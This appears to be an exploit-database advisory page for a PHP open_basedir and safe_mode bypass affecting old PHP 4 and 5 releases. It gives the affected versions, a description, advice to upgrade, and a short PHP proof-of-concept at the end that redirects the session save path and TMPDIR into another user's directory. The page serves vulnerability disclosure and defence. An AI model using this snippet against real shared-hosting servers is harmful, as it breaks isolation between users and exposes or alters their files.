PHP open_basedir Restriction Bypass Vulnerability

vendor:

PHP

by:

Unknown

7.5

CVSS

HIGH

open_basedir restriction-bypass

Unknown

CWE

Product Name: PHP

Affected Version From: PHP 4 up to and including 4.4.6, PHP 5 up to and including 5.2.1

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE: php

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

PHP open_basedir Restriction Bypass Vulnerability

The PHP open_basedir restriction-bypass vulnerability allows attackers to access sensitive information or write files in unauthorized locations. This vulnerability is due to a design error. It can be exploited in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code. The 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other, but this vulnerability bypasses those restrictions.

Mitigation:

Upgrade to a version of PHP that is not affected by this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23183/info

PHP is prone to a 'open_basedir' restriction-bypass vulnerability due to a design error.

Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.

The following versions are vulnerable:

PHP 4 up to and including 4.4.6
PHP 5 up to and including 5.2.1 

<?php
  ini_set("session.save_path", "/sessions/user2/");
  putenv("TMPDIR=/sessions/user2/");
  ini_set("session.save_path", "");
  @session_start();
?>